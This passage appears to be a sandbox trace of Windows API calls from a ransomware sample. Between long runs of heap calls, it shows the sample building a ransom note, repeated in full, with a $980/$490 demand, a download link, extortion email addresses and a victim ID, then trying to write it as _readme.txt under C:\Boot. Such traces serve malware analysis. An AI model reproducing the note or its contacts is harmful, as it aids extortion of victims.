hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.922] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.922] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.922] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.922] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.922] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.922] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.922] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.922] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.922] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.922] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.922] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.922] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b65058 [0200.922] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.922] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.922] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.922] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.922] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0200.922] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.922] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.922] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.922] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0200.922] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.922] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.922] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.922] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.922] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.922] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.922] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.922] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.922] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.922] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.922] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.923] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.923] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.923] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.923] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.923] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.923] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.923] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.923] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.923] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.924] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.924] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.924] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.924] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.924] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.924] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.924] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.924] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.924] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.924] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.924] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.924] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b25070 [0200.924] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b65058 [0200.924] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b25070 | out: hHeap=0x2c0000) returned 1 [0200.924] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.924] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.924] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.924] PathFindFileNameW (pszPath="C:\\Boot\\sv-SE\\") returned="sv-SE\\" [0200.925] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0200.925] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.925] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0200.925] PathFindFileNameW (pszPath="") returned="" [0200.925] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75020000 [0200.925] GetProcAddress (hModule=0x75020000, lpProcName="SHGetFolderPathW") returned 0x750a5708 [0200.925] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3b65058 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0200.925] FreeLibrary (hLibModule=0x75020000) returned 1 [0200.925] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.925] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.925] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.925] PathAppendW (in: pszPath="C:\\Boot\\sv-SE\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\sv-SE\\_readme.txt") returned 1 [0200.925] PathFileExistsW (pszPath="C:\\Boot\\sv-SE\\_readme.txt") returned 0 [0200.926] lstrcpyW (in: lpString1=0x3b67060, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj48" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj48") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj48" [0200.926] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj48", lpString2="8TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj488TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj488TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1" [0200.926] CreateFileW (lpFileName="C:\\Boot\\sv-SE\\_readme.txt" (normalized: "c:\\boot\\sv-se\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0200.926] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b16180 | out: hHeap=0x2c0000) returned 1 [0200.926] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67060 | out: hHeap=0x2c0000) returned 1 [0200.926] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.926] FindFirstFileW (in: lpFileName="C:\\Boot\\sv-SE\\*", lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x32ef1f8 [0200.926] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.926] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0200.926] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe868d5aa, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15640, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0200.926] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe868d5aa, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15640, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0200.926] FindClose (in: hFindFile=0x32ef1f8 | out: hFindFile=0x32ef1f8) returned 1 [0200.926] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b158f8 | out: hHeap=0x2c0000) returned 1 [0200.927] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9250 | out: hHeap=0x2c0000) returned 1 [0200.927] PeekMessageW (in: lpMsg=0x39cfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cfb74) returned 0 [0200.927] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.927] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.927] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.927] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.927] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.927] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.927] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.927] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.927] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.927] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.927] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.927] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.927] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.927] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.927] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.927] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.927] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.927] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.927] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.927] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.927] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.927] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0200.927] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.927] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.927] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.927] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.927] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x3b65058 [0200.927] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.927] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.927] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.928] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.928] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.928] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.928] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.928] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.928] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0200.928] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.928] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.928] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.928] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0200.928] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.928] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.928] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.928] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0200.928] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.928] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.928] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.928] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.928] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.928] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.928] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.928] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.928] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.928] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.928] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.928] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0200.928] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.928] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.928] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.928] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0200.928] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.928] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.929] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.929] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.929] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.929] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.929] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.929] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.929] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.929] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.929] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.929] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.929] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.929] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.929] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.929] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.929] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.929] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.929] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.929] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.929] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.929] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.929] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.929] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b25070 [0200.929] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b25070 | out: hHeap=0x2c0000) returned 1 [0200.929] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.929] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.929] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.929] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, 